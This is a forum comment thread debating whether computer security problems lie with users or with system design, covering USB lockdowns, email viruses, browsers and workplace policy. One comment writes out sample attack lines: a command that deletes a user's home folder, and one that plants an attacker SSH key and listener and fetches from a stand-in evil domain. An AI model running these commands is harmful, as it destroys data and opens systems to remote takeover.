(Score: 3, Insightful) by kazzie on Monday October 03 2016, @08:00PM
When you disconnect the front-panel USB ports, people will look round the back for a USB port to use. (You know, the ones directly soldered to the motherboard.)
If you get a system with no spare USB ports, then some smart person will start unplugging keyboards etc to plug their peripheral in.
It's probably better to deal with the issue within the OS in the end.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @07:59AM
Until everything is optical, the OS will not be able to protect the computer against a little 10cent device called a voltage doubler.
(Score: 3, Interesting) by TheRaven on Tuesday October 04 2016, @08:44AM
It's probably better to deal with the issue within the OS in the end.
Some of the recent USB malware attacks the USB controller's firmware directly. It will work even when there's no OS running. There are only a handful of USB controllers on the market and most instances of them are running old and unpatched firmware. Why attack an OS that's receiving regular security updates when you can attack some poorly written code that runs with higher privilege than the OS and is never patched?
sudo mod me up
(Score: 2) by Scruffy Beard 2 on Monday October 03 2016, @08:07PM
kazzie hinted at the answer: You use USB for the keyboard and mouse. Apparently the old PS/2 ports were too complicated (separate incompatible ports for the keyboard and mouse: using the same connector *was* a little weird/awkward).
What is worse, is that you do not even need to unplug the keyboard. It may act as a USB hub, depending on the model.
(Score: 1) by toddestan on Thursday October 06 2016, @01:34AM
Actually, I know at least with Lenovo you can still order many of their desktops with PS/2 ports, for the sole reason that once you get the mouse/keyboard off of USB you can now disable the USB ports to keep people from plugging things into them. They are also smart enough to detect whether it's a mouse or keyboard plugged in and adjust accordingly so it doesn't matter how you hook them up. Unless something has changed recently, they aren't hotpluggable though.
(Score: 5, Insightful) by Francis on Monday October 03 2016, @08:14PM
This attitude is why working sucks. Unless you're doing something that requires listening, why should the boss even care if the employees listen to music? This sort of psychopathic viewpoint accomplishes nothing of value.
(Score: 1, Insightful) by Anonymous Coward on Monday October 03 2016, @08:20PM
That attitude is how you get your end users actively working against your security. I have seen it many times. I will probably see it again in the future.
(Score: 2) by The Mighty Buzzard on Monday October 03 2016, @09:24PM
It keeps your shitstain employees from spending an hour creating a playlist on company time. Also, music is a distraction. Yes, even to you. When you can end up lost and not turn the car radio down, I might buy that line of bullshit; not until.
My rights don't end where your fear begins.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @09:31PM
If your employees are really that unproductive then fire them. If this is a recurring problem then perhaps look in a different direction for the cause....
If we ever make it to the post scarcity economy I thin people like you will be the first to achieve so-called enlightenment. Once your brain gets to drop all the cruft that goes along with work/bootstraps/anxiety/fear/anger it will have the perfect example of the insanity of reality. Poof, you'll be lighter than air and happier than ever.
Either that or your brain won't let go and you'll be one of the most miserable people mad at everyone for becoming happier overall.
(Score: 1, Funny) by Anonymous Coward on Monday October 03 2016, @09:45PM
You're one of the shitstain employees. Do yourself a favor and just resign now. If you insist on staying, know that if the building ever catches fire, you will be held personally responsible. Why do you want to work here anyway.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @10:12PM
Awww, po' baby got twiggard!
(Score: 2) by The Mighty Buzzard on Tuesday October 04 2016, @12:02AM
Good luck with that post-scarcity thing. I keep hearing it but I highly doubt it will ever materialize. Human ingenuity will always be a scarce commodity.
My rights don't end where your fear begins.
(Score: 2) by Zz9zZ on Tuesday October 04 2016, @12:21AM
We are already in a post scarcity world for most countries, or could be if we made decisions along that vein. However, greed has kept us locked into a class system. The people at the top don't want anything to change, and the people that want to BE at the top don't want it to change either. They dream of being the king.
Energy is the last big hurdle, and if we had actually invested in solar and other renewables a long time ago we would be done with that problem too. But again, the oil barons wanted to keep their empire rolling... Your last sentence is actually quite the kicker, in the post scarcity world human ingenuity will be much more available (fewer people ticking boxes and sleeping through meetings) and also more valuable.
Its not a simple change, but I think its one worth striving for instead of going round and round the already sold out Monopoly board.
~Tilting at windmills~
(Score: 2) by The Mighty Buzzard on Tuesday October 04 2016, @12:41AM
Nah, as long as human ingenuity is valuable there will be no post-scarcity world. Nothing will change. Since the first currency was invented, it was never about the resources and always about human ingenuity.
My rights don't end where your fear begins.
(Score: 2) by Scruffy Beard 2 on Tuesday October 04 2016, @01:22AM
Solar and renewables are chump change compared to nuclear power.
It just sucks that our current nuke plants use so little of their fuel. (If 95% of the fuel was used up, there would be no waste problem).
(Score: 4, Insightful) by Anonymous Coward on Tuesday October 04 2016, @12:13AM
(Score: 3, Interesting) by The Mighty Buzzard on Tuesday October 04 2016, @12:31AM
That's some of the funniest shit I've heard all day. It's first, last, and all points in between about the money for them. Don't believe it? See if they'll accept trust and respect in lieu of wages.
Now if you want to pay a motherfucker to dick around, be my guest. This is America and your business is by definition your business. Me, I want every dime I pay someone to be earned and if extra work at crunch time is necessary, I'll pay them the extra with a smile because they've earned it.
My rights don't end where your fear begins.
(Score: 5, Insightful) by Anonymous Coward on Tuesday October 04 2016, @02:15AM
Like most selfish dipshits, you've never learned just how powerful and important morale is. With high morale, they will, in fact, accept trust and respect in lieu of wages. Not for their entire salary, of course, but you can "purchase" many extra manhours of work per week per person that way.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @03:31AM
Yup! When work is slow people dick around and take it easy. If you're a good boss/client those workers will bust their asses to make sure things work out.
If you're too narrow minded and demand that every minute is accounted for, well you create stress where it is unneeded and thus your workers are unfairly taxed with "urgency". It is a real thing, and trying to pull spreadsheets out to argue the point will only lose you credibility.
(Score: 2) by SecurityGuy on Tuesday October 04 2016, @01:32AM
If you have shitstain employees who spend an hour creating a playlist on company time, then their listening to music isn't the problem. Goofing off on company time is the problem.
Personally, I listen to music at work when I need more focus than I can get without. Sure, I could focus even better in perfect silence, but cube farms aren't conducive to perfect silence. In point of fact, my company bought us all noise cancelling headphones in recognition of the fact that when you're trying to focus, having to listen to the guy over the cube wall can be a hell of a lot more distracting than music.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @08:39AM
Talk about useless optimizations. People might have wasted some time on the company's dime; how terrible! Unless it become a serious issue, I don't see the problem. Sometimes, doing 'useless' things can improve efficiency by giving the employees enough time off to prevent brain overload. There's also a concept known as diminishing returns; expecting people to work at 100% efficiency for hours and hours is unrealistic.
It's pretty much never good to micromanage employees, and if some of your employees are so bad that you feel they need to be micromanaged, then they need to be fired.
(Score: 1) by Francis on Tuesday October 04 2016, @01:57PM
There's no clinical evidence to support such a strong assertion. There's a huge variety of music and of individuals. I personally get a whole lot more done of certain types of tasks when I'm listening to music. There are combinations to avoid like any type of music with words when you're working with words as the two interfere with each other. But, in most jobs there's a ton of time where you're not needing to do much thinking because you've done the task dozens of times and having music makes that go a lot more smoothly.
As for the car, again, it depends a great deal on what kind of music you're listening to. On the rare occasion where I'm driving, I'll throw on some baroque music and it makes the process a lot calmer and a lot safer. Unfortunately, you can't legally do that on a motorcycle around here, so I'm stuck without the music.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:15PM
Then you get, "We just lost a $20k contract with Foo Inc. because we couldn't send a PDF application they gave us via USB stick fast enough. You're fired!"
Blunt policies can't make judgements about legitimate uses versus cruft.
(Score: 2) by EvilSS on Monday October 03 2016, @09:09PM
It's easier to just restrict them with software. That way you can allow specific devices and you don't fuck your leases gluing plugs into the USB ports of thousands of PCs. I have several clients that do this. Mice, keyboard, specific equipment, and company owned encrypted thumb drives are all that's allowed.
(Score: 3, Insightful) by MostCynical on Monday October 03 2016, @10:15PM
when "users" (aka "employees") are forced to work in 'open plan' torture centres, with no privacy, lots of noise and movement (just from people going to the loo - how dare they!), headphones can be a god-send. Little bit of music while you get the seventh revision done and checked (while not disturbing others) makes concentrating far easier.
if the internet is disabled, using the USB is verboten (you signed the policy), then I just use a radio (shock, horror, FM *and* AM, and, even, now DAB+). For those who's musical taste precludes listening to broadcast radio, MP3 players are not expensive.
For employers who expect employees to suffer ("Stop being happy! I'm not paying you to smile!"), well, you'll likely never learn, and always be surprised with your employee churn..
"I guess once you start doubting, there's no end to it." -Batou, Ghost in the Shell: Stand Alone Complex
(Score: 1) by Francis on Tuesday October 04 2016, @01:59PM
Usually, you can also use a cellphone. An unlimited data plan isn't that expensive any more and if they're being bitches at work, it's the step before going to work for somebody that knows what they're doing.
(Score: 2, Insightful) by Anonymous Coward on Monday October 03 2016, @07:57PM
I'll take 3 kg of it.
Wait, what actually is being proposed?
Design better?
Ok... I guess, sure new is always better,
everyone knows that(especially if it hoses up a working system/process).
And better new is even more better.
How?
Take users into more considerations.... Sure why not.
Especially every user, who tends to be lazy with efforts others toss on them for no immediate benefit.
Exactly how, here is an example?
Nope. Not even one.
As long as everyone feels better now, what was the issue?
So, perhaps OP should go into politics, where rah,rah,signaling,signaling,no results,no results is status quo and good enough to get re-elected, especially if some pork falls into the right hands.
(yes, some designs are better than others)
(yes, some designs do not include significant security)
(no, security is not free)
(no, your idea of cost versus value does not agree with the next persons idea, unless significant coercion is involved, and even then...)
(Score: 3, Informative) by Scruffy Beard 2 on Monday October 03 2016, @08:15PM
Modern computer systems are so insecure, it is hard to know where to start.
Ideally, it should be safe to open random e-mail attachments: as long as you do not take deliberate steps to make them executable. However, few file formats properly separate software from data. I think image and plain-text formats come close. PDF used to be good, until Adobe added JS support (Why?!!? the selling point was that PDFs acted like paper!).
IMO, the problem is that everything is developed using ad-hoc debugging, rather than formal verification. Hopefully, now that technology advances are slowing, we can start to focus more on code (and hardware) correctness.
(Score: 2) by q.kontinuum on Monday October 03 2016, @09:05PM
Start with open standards, encouraging diverse OS environments. I'm not claiming Linux was inherently saver than Windows. (I don't think there is any autostart for USB sticks in any major distribution, but I might be wrong. Maybe systemd embeds such a feature somehow, or Gnome 3 does, or whatever nonsense.) But it does put a smile on my face when I visit a fishy site and Linux asks me if I want to start wine to open $evilware.exe.
Registered IRC nick on chat.soylentnews.org: qkontinuum
(Score: 3, Insightful) by vux984 on Tuesday October 04 2016, @06:49AM
I don't think there is any autostart for USB sticks in any major distribution, but I might be wrong.
Doesn't need an autostart, just an embedded HID profile that sends keystrokes to open a terminal, and then run a script to ransomware your user profile. If your distro has an unpatched exploit (zero day) that can be escalated from a local logged in user, it can have your system rooted before you know what hit you.
(Score: 3, Informative) by q.kontinuum on Tuesday October 04 2016, @07:46AM
Doesn't even need a zero-day for many attacks.
To be destructive, "rm ~/.* -rf ~/*" would be sufficient (I don't care much if someone wipes my desktop system, it's not hard to re-install. But the user-data could be a bigger pain in the ass. I do backups, but not my whole home folder.)
For a more invasive attack, "echo $PUBKEY > ~/.ssh/authorized_keys; echo 'disown $IRCLISTENER' > ~/.bashrc; wget $MYEVILDOMAIN/$USERNAME" would be sufficient to gain remote access. Most of the interesting things do not require root-access anyway, the most interesting data is usually somewhere in the home-folder. Not sure if a SYN-attack is easily possible without having root-access on the botnet-hosts; I think you need root-access to manipulate raw-header.
Nevertheless, creating such a device, while not rocket-science, is still a bigger task than copying an auto-start file to a regular USB stick. Also my main-point stands: On a diverse environment, this attack will only reach a subset of machines, the rest might show awkward behaviour and therefore lets you more easily detect the attack.
Registered IRC nick on chat.soylentnews.org: qkontinuum
(Score: 2) by tangomargarine on Tuesday October 04 2016, @02:28PM
unpatched exploit (zero day)
Technically incorrect usage. A zero-day is an exploit for which a patch *doesn't yet exist*, not just one you yourself haven't patched yet.
But the whole term irritates me because by definition like 90% of exploits are "zero-day" when they appear.
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 2) by vux984 on Tuesday October 04 2016, @04:37PM
Technically incorrect usage.
It was intended as more of an either/or/"whatever"/"pick your poison" usage, but I'll concede that doesn't really come through.
However a zero-day isn't really an exploit for which a patch "doesn't yet exist"; although not having a patch for it is implied since there have been zero days to produce one. A zero day is an exploit for a flaw that hasn't been *recorded* yet. As in "This software flaw this exploit has been using has been known about for zero days."
The point is there is a class of exploits for which a patch doesn't exist yet, but which are not 'zero days' either. For example, if I report an exploitable flaw to Cisco, and they don't release a patch for it for 60 days. The flaw is not a "zero day" a month after I report it, but a month before a patch is available.
Additionally, its not necessarily a zero day the day I report it to cisco; because zero-day is supposed to be for exploits that are active in the wild. A responsibly discovered and disclosed vulnerability that isn't actively being exploited is never technically a zero day.
Of course the media will call pretty much anything a zero-day and language reflects uagage so technical debates about what is and is not a zero day is just tilting at windmills.
(Score: 2) by tangomargarine on Tuesday October 04 2016, @05:13PM
Of course the media will call pretty much anything a zero-day and language reflects uagage so technical debates about what is and is not a zero day is just tilting at windmills.
Call me Don "Prescriptivist, Dammit!" Quixote :)
I'd think with the number of programmers we have around here we'd have a few more prescriptivists. If you use the word wrong/wrong word in programming, it just plain doesn't work.
"Is that really true?" "I just spent the last hour telling you to think for yourself! Didn't you hear anything I said?"
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:17PM
Thank you, I was typing up something along the same lines and gave up, you did a nice job of it. There is no "secure" OS, the user is always a vector for infection and it IS a security vs. usability concern. Can't give root to everyone, can't guarantee that every new file is safe.
All that said, I agree with the general premise of making security easier for users.
(Score: 2, Insightful) by Anonymous Coward on Monday October 03 2016, @08:03PM
It's not because an eminence grise of security says something that he is always right.
In this case, he is wrong, the user most certainly needs fixing.
The problem isn't the users: it's that we've designed our computer systems' security so badly that we demand the user do all of these counterintuitive things.
No, security is just counterintuitive to how people normally operate. Get over it. It is that way so that you actually THINK before acting instead of acting and then blaming the results on 'a difficult system'.
Why can't users choose easy-to-remember passwords? Why can't they click on links in emails with wild abandon? Why can't they plug a USB stick into a computer without facing a myriad of viruses? Why are we trying to fix the user instead of solving the underlying security problem?
Because the world isn't a happy place where all sing kumbaya. The user IS the problem.
Or in other words: we make it deliberately hard and counterintuitive to launch nukes, should we make it easier perhaps.
(Score: 2) by MrGuy on Monday October 03 2016, @09:14PM
A theory proven by the fact that social engineering attacks work, and are still one of the most important vectors for security breaches.
People want to trust the person on the other end of a phone is a real person, who is who they say they are, and a well-intentioned person who is being upfront about their motivations and goals. People do not default to "don't trust," especially when the person in question becomes abusive, unreasonable, or threatening to their job. Even people who are specifically instructed on policy and how social engineering attacks work are vulnerable if the "path of least resistance" is to bend the rules just this once, because I'm sure he's who he says he is and I don't see why it's a big deal to reset his password for him anyways.....
(Score: 2) by Arik on Monday October 03 2016, @10:01PM
"Because the world isn't a happy place where all sing kumbaya. The user IS the problem."
But all these things are reasonable. Most password restrictions are not necessary and not security-positive either. It should be perfectly safe to click on any arbitrary link, it IS (essentially) safe to do so using a sane browser in fact. Autorunning malware off a USB stick is only possible because Microsoft deliberately rigged an insane mechanism here and even after being lambasted for it thoroughly by everyone they keep right on shoving that down the users throat. It's a misfeature, a design failure, simple as that.
If laughter is the best medicine, who are the best doctors?
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @09:15AM
No, security is just counterintuitive to how people normally operate.
In other words, security breach is based on exploiting normal behavior. If you change normal behavior to plug security holes, the security landscape changes, revealing next set of security holes. If doing right thing is inducing more everyday effort, then sooner or later either someone will invent yet another "simple & easy" gadget or widget that is supposed to make users' lives easier again and that novelty will become a new attack vector, or users will simply suffer fatigue and start short-circuiting and working around security procedures.
In short it is unsolvable problem, especially if left to users to implement any proposed solutions.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @08:15PM
You are entering the blame game. Neither the user nor the system will get fixed when the fault is always at the other end.
Unfortunately, both are necessary. A technical fix will not help if the user is an antisocial ass and you can't expect great masses to go counter their own personal interest in the name of security when the design is thoroughly misguided.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:09PM
They are also over-used by CYA-minded security officials. At our org, opening common file formats on the WAN, such as "zip" triggers a vague warning about "certain file types can harm your computer...". People learn to ignore them, and as a result distrust other warnings as administrative nag-ware.
It's like your neighbor's faulty car alarm: you start to ignore all car alarms because you "know" it's probably just another false alarm triggered by squirrels or the Sun yet again. (God, I hate those. I almost put a "Free Car" sign on one as revenge.)
(Score: 0) by Anonymous Coward on Monday October 03 2016, @08:41PM
i don't entirely agree here. security is the responsibility of the whole system, and all of its parts must operate with it in mind, and users are a part of that system. the computer equipment and software are only another portion of the system.
the expectations placed on users varies with role and context- i don't expect the same good habits from the players of the game as i do from the developers of it, for example. users however want/need access to things that they can hurt themselves or others with. they will invariably obtain some degree of this access. they must learn to use their flexibility responsibly.
a construction worker has access to powerful machinery that blow through rocks and dirt like a kid through a bag of marshmallows. they use those things all day. whose fault is it if he operates it while drunk, and smashes someone's car? he bears some of the responsibility for using his power appropriately. if drinking alcohol all morning is his natural 'inclination' or was 'easy' for him, i don't think that automatically means the construction equipment was designed wrongly to prevent this possibility. i think a bigger problem is people not having an idea of how much power they really have.
(Score: 3, Informative) by Arik on Monday October 03 2016, @08:50PM
As best I can remember Microsoft made that myth real with the first release of Outlook, but I could be forgetting something that was less widespread perhaps. Certainly there's no way you can get a virus using a sane email client like, oh, pine. Nope, not without being aware of the attachment, deliberately downloading it, deliberately executing it.
Similarly, simply opening a website should NEVER, EVER be a security risk in a sane browser. Yet look at what they try to call webpages today. If you don't have a dozen critical security problems (or at least emulate them in a VM) you can't even get most of these things to display.
If laughter is the best medicine, who are the best doctors?
(Score: 2) by MrGuy on Monday October 03 2016, @09:09PM
Yep. The internet sure was better when everything was plain text, and lynx was the state of the art as a browser. That's the only sane way to use the internet, and all these new fangled people with their formatting and their images and videos are just completely unreasonable in thinking that's something we should support.
(Score: 2) by Arik on Monday October 03 2016, @09:45PM
You speak as if you don't think it's possible to have formatting and images and videos without also having insecurity. Can you really believe that?
If laughter is the best medicine, who are the best doctors?
(Score: 2) by MrGuy on Monday October 03 2016, @10:35PM
You speak as if you think formatting and images and videos are a problem that's holding back the internet from reaching its full potential, and we should really go back to the "good old days" when the internet was all text.
Can YOU really believe that?
(Score: 1, Informative) by Anonymous Coward on Monday October 03 2016, @11:12PM
Arik never said anything about formatting/images/videos, just that most browsers and websites have huge vulnerabilities because very little attention was paid to security. It isn't about the good old days, its about security.
(Score: 3, Informative) by termigator on Tuesday October 04 2016, @04:07AM
People forget that there were attempts a long time ago to provide formatting in email (e.g. text/richtext, text/enriched, text/setext, etc). Did not get much traction, likely due to graphical environments still being more of a luxury. Then the web with HTML came along. Instead of asking, "Should we?" asshats decided that HTML (which brings in scripting support) should be used: "Hey we got this web browsing thingamjing, so lets slap it into our email client... look I can use colors and make my text real big, whipee!". HTML in email was chosen by developers out of pure laziness and cluelessness.
Images and video attachment capabilities in email pre-date the web. I think what some of us object to is the gross ignorance that has been pushing the evolution of MUAs. Microsoft has been the worst in screwing up the progress and usage of email-based technologies. I hope there is a special place in hell for them.
(Score: 1) by andersjm on Monday October 03 2016, @09:23PM
pine is written in C. Don't count your chickens.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @09:33PM
Somebody should rewrite pine in Ada. Adapine will be perfectly secure because nobody will ever use it.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @11:31PM
pine, mutt, outlook, and every other major email client have each had open-email-and-get-pwned bugs. More in outlook (see: hooking system explorer renderer in old versions?!) but not zero in any.
(Score: 5, Insightful) by maxwell demon on Tuesday October 04 2016, @09:03AM
I don't know about pine and mutt, but the problem with outlook was that it was not a bug. It was a misdesigned feature.
Yes, bugs creep in, and some bugs may be so bad that they may be used to pwn your computer. But they are not there by purpose. A misfeature is there by purpose, and a misfeature that is designed in a way that you have to think less than a minute about to see how it could be used for malicious purposes absolutely should not get into a product. Ever.
Bugs cannot be completely avoided. Blatant misfeatures can.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @09:59PM
And, yet, I *still* get the occasional e-mail to which a Word document has been attached and the text of the message is "read this".
Biggest offender: the monthly security newsletter from corporate HQ. Yes, I've complained.
(Score: 1, Informative) by Anonymous Coward on Monday October 03 2016, @10:16PM
Getting a virus simply by opening an email was an urban legend
You have not been doing this very long have you?
"I LOVE YOU" https://en.wikipedia.org/wiki/ILOVEYOU [wikipedia.org]
deliberately executing it.
That bad boy took out the whole company I worked at when it came out. 20k in employees. Not a outlook server or client in sight. That email prog was fun *@*@* and you could spam the whole company. They ended up taking it out at the server level and just stripping the payload. Deliberate execution is exactly how it spread. Most people trust their coworkers and friends. I 100% guarantee you could email a docx to your whole list of people you know and at least one person would open the file. Even people who are 'smart' about it can have a brain fart and mess up.
It is also why JS and COM execution was disabled around 1999 in most email clients.
(Score: 3, Informative) by maxwell demon on Tuesday October 04 2016, @09:07AM
From the post you replied to, emphasis by me:
From the linked Wikipedia page, right in the first sentence, again emphasis by me:
I'd say the link confirms that post, rather than refuting it,
The Tao of math: The numbers you can count are not the real numbers.
(Score: 1, Informative) by Anonymous Coward on Tuesday October 04 2016, @08:49PM
You have not been doing this very long have you?
"GOOD TIMES" https://en.wikipedia.org/wiki/Goodtimes_virus [wikipedia.org]
(Score: 3, Informative) by FatPhil on Tuesday October 04 2016, @11:42AM
I remember predicting its inevitability whilst bashing^Weducating bulk hoax forwarders in 1995, and remember it coming true remarkably quickly.
Great minds discuss ideas; average minds discuss events; small minds discuss people; the smallest discuss themselves
(Score: 2) by The Mighty Buzzard on Monday October 03 2016, @09:18PM
**hefts his LART and grins**
My rights don't end where your fear begins.
(Score: -1, Troll) by Anonymous Coward on Monday October 03 2016, @09:26PM
Micro aggression alert. Stupid people have every right to use the internet to find low-paying jobs and connect with idiot friends and family members. Your elitist attitude has no place in modern society. Prepare to be exterminated in the name of social justice, you backward-thinking anachronism!
(Score: 2) by Zz9zZ on Monday October 03 2016, @09:47PM
Offtopic: your sig is a bit homoerotic, I would expect it in a some stand-up comedy routine but as a sig it is really counterproductive and gives people all sorts of presumptions about TMB. Ya ya I'm sure you could care less what other people think, just FYI.
~Tilting at windmills~
(Score: 0) by Anonymous Coward on Monday October 03 2016, @09:53PM
It's only homoerotic when you assume the reader is male. No, the offensive part is the assumption of only three candidates. Now get under my desk and Jill me off, intern.
(Score: 2) by Zz9zZ on Monday October 03 2016, @10:21PM
Never mentioned offensive, but I did imply crude. The point was that if you want to promote a 3rd party choice you shouldn't use crude humor as it will have a larger percentage of negative reactions. I could be wrong given the demographics of this site, but pretty much anyone who laughs at your sig and knows what it is about probably already agrees with you on voting for Johnson. But hey, nice to see a plug for Stein, too bad its wrapped up in more middle school humor.
~Tilting at windmills~
(Score: 2, Troll) by The Mighty Buzzard on Monday October 03 2016, @11:59PM
That's okay, I'm not homophobic. I'm homo-don't-give-a-shit-ic. That's where you get to put whatever you want in your cavities and as long as you're not doing it on the street or coming up in my house I don't give a shit. This is differentiated from the SJW mentality by my utter lack of cheerleading, telling gay folks they're being oppressed, or trying to get them to hate straight, white men.
My rights don't end where your fear begins.
(Score: 4, Insightful) by TrumpetPower! on Monday October 03 2016, @09:27PM
There're all sorts of simple and obvious things that you shouldn't do with cars that can cause all sorts of bad things to happen, from trying to start the engine when it's already running to braking hard enough for the wheels to lock up.
And, for the longest time, mechanics and auto manufacturers told people, "Don't do that!" and blamed them for the results when they inevitably did so anyway.
But today's cars don't even let you do those things any more -- and we're all better off as a result.
It's high past time computer engineers learned this lesson from their automotive counterparts.
Because, just as you might be able to brake marginally faster manually than with ABS, what makes you think the little old lady behind you can?
When you understand why you should want the cars around you to have ABS brakes and why such a want is entirely unrelated to questions of anybody's competence and / or machismo as a driver, you will understand why you should stop blaming people for common security "mistakes" and fix your broken systems in the first place.
Cheers,
b&
All but God can prove this sentence true.
(Score: 2) by edinlinux on Tuesday October 04 2016, @01:00AM
This is why you need to be licensed to drive a car..
Maybe people need to be licensed to use a computer then?
(Score: 2) by Scruffy Beard 2 on Tuesday October 04 2016, @01:36AM
Microsoft has been advocating that with their Trusted Computing initiative.
Requiring a license to use the computer means no more "hacker" operating systems.
It also means that Microsoft administers e-voting. If you refuse to use a "licensed" system, no voting for you!
(Score: 2) by maxwell demon on Tuesday October 04 2016, @08:13AM
No, Trusted Computing does not involve an official license for the user comparable to the driving license. Instead, it involves locking down the computer, which would be the equivalent to forbid servicing your own car. Very different things.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by Scruffy Beard 2 on Tuesday October 04 2016, @06:32PM
When I posted that I was thinking of an old video that Scott Charney, Corporate Vice President for Microsoft's Trustworthy Computing Group posted many years back.
I believe I have a copy sitting on a drive about 12km away. I asked Microsoft for permission to publish the transcript, but never followed up when they asked me to show them how it would be displayed on my website. I was not able to find it in initial searching.
In it he does advocate an internet license. You would not get online unless your PC remotely attests that you are using a blessed Microsoft stack.
(Score: 2) by maxwell demon on Tuesday October 04 2016, @07:45PM
Again, not the same, no matter how Microsoft calls it. You don't have to prove that you've got a certified Ford in order to get your driving license.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by maxwell demon on Tuesday October 04 2016, @08:11AM
Actually you can use a car without a license; you just can't use it on public roads.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @05:20PM
... legally
(Score: 3, Insightful) by MrGuy on Monday October 03 2016, @09:36PM
I'll let novices use hand woodworking tools without much supervision. The worst that's going to happen is someone bashes their thumb with a hammer. They can build basic things just fine. If they want to leap up to using the pneumatic stapler, I'm going to want to make sure they understand how it works, and know they're not going to shoot at each other with it when my back is turned. If they want to use the table saw, I'm going to want to be damn sure they know how it works, understand appropriate safety rules, and never, ever put their fingers where they shouldn't go, or I'm damn sure going to take away their privileges to use it.
The power user with access to all the tools can do a lot more, a lot faster, but with a lot more risk of doing harm if they're not careful. The fact that some tools can do damage if the operator doesn't know how to use them safely isn't a good argument for taking away all the power tools. Nor does it (to me) make a compelling case that we need to invest a huge amount of resources in developing power tools that are so safe that no one can ever hurt themselves with them. It won't really help the people who should have access to power tools, and won't really teach the people who shouldn't how to behave safely.
The hard part, of course, is figuring out what the level of capability someone has, and giving them appropriate access to functionality based on that. This doesn't have a straightforward answer. But I'm sure the answer isn't either extreme of "just trust them!" or "lock everything down always."
There's a lot of room here for training and assessment. Oh, you want local admin on your machine? OK, please take the online test - if you pass it, we'll allow it.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @09:47PM
We don't have time for training! Hire the H1Bs and give them access! Now!
(Score: 4, Interesting) by MichaelDavidCrawford on Monday October 03 2016, @09:54PM
originally it was a polite society. Security was thought not to be required because everyone agreed to play by the rules. For example sending one single spam could get you completely disconnected. It's not like they didn't know what cryptography was, but it was not used because of arms export laws.
The World Wide Web was such a huge hit that there was great pressure to open the Internet to the public; this was done in a hurry, without anything being done to secure it.
I don't really see any substantial way to improve the situation. I know a college professor who lost four grand when he followed the instructions in a phishing spam. He's a smart guy, but his expertise has to do with blueberries; he doesn't know from security.
Yes I Have No Bananas. [gofundme.com]
(Score: 1, Touché) by Anonymous Coward on Monday October 03 2016, @10:12PM
Eternal September ruined everything by letting the unwashed common people onto the network. The Internet should be used only by rich white college students at Ivy League universities like God Himself intended.
(Score: 0) by Anonymous Coward on Monday October 03 2016, @10:00PM
Good security requires money and resources because it manages systematic risk. Most businesses do not want to hear about it: "that's ridiculous we aren't the CIA", "why would anyone care about what we have?", "that will never happen". The IT industry has done a piss-poor job of quantifying systematic risk for businesses because theee things take time to develop. Sexual harassment liability is a great example of systematic risk that has been properly quantified and is addressed by most every business; but that took years to develop. IT security will come with time as information security develops into a mature industry.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @12:04AM
No shit. RTFM attitudes are just symptomatic of lazy assholes that won't do their job properly and try to shift their responsibilities onto others.
(Score: 3, Interesting) by Bogsnoticus on Tuesday October 04 2016, @12:25AM
We're trying to educate the user, but many users prefer not to think for themselves, and complain to the marketing department of companies that things are too hard to do.
So the marketing departments, instead of wanting stuff designed to withstand attacks from the lowest common denominator in cyber-crims, instead demand products get made to cater to the lowest common denominator in user-land.
You'll see it in every industry. When a user/customer is confronted with a technician or mechanic saying "XXX cannot do that function", they're response is always "but the salesperson said it could".
They would rather argue with the guy/gal trying to fix the problem and threaten legal action, than admit to themselves that they were duped by a smooth talking shyster whose entire job is to ensure a fool and their money are parted.
Genius by birth. Evil by choice.
(Score: 2) by PocketSizeSUn on Tuesday October 04 2016, @02:59AM
They would rather argue with the guy/gal trying to fix the problem and threaten legal action, than admit to themselves that they were duped by a smooth talking shyster whose entire job is to ensure a fool and their money are parted.
If they were duped by a shyster they should get their money back, no?
If they get their money back they won't keep arguing, no?
So it's really the criminally liable companies that insist they don't have to live up to their shyster sales-person's promise that is to blame, no?
Or perhaps I am misunderstanding the situation.
(Score: 2) by Bogsnoticus on Tuesday October 04 2016, @05:30AM
They "should" get their money back, but the process of doing so means they have to admit to others, and themselves, that they were stupid in making that particular decision. Nobody wants to look stupid in front of others.
So instead of doing the right thing, they throw tantrums and threats around (sound like anyone we know applying for a certain high level govt position?).
End result is the marketing folks end up making technical decisions, which all end up the same: "Make is easy for idiots"
Genius by birth. Evil by choice.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @03:35AM
The only way this will work out is if we stop using GPCs.
One man's security issue is another man's solution to a problem.
Every human defined procedure has at one point or other been violated, likely more often because they are obsolete and a hindrance for getting ones job done than because of nefarious intent.
In the end this is a color of bits issue, and that is one we can never settle on the spot. Only via hindsight can intent be assessed, and potential guilt be assigned.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @03:58AM
Indeed. A major reason that security problems are around is because the thing isn't coated in rubber, so it can actually be used for a variety of things. The only way to "fix" the machine is to severely cripple it, with all real control passed to a non-user (re: the company that REALLY owns the machine you paid for).
(Score: 2) by maxwell demon on Tuesday October 04 2016, @08:24AM
I don't think the GNU Pascal Compiler is related to the problem. :-)
No. You seem to think "security" means "Sorry, Dave, I cannot allow to do that." While in reality it often rather means "Err, Dave, what you are trying to do is extremely risky. Therefore I want to make sure that you actually absolutely want to do this. Therefore I make it harder, but not impossible for you to do it."
This is not about intent, it's about negligence.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 0) by Anonymous Coward on Tuesday October 04 2016, @07:32AM
> Why can't users choose easy-to-remember passwords?
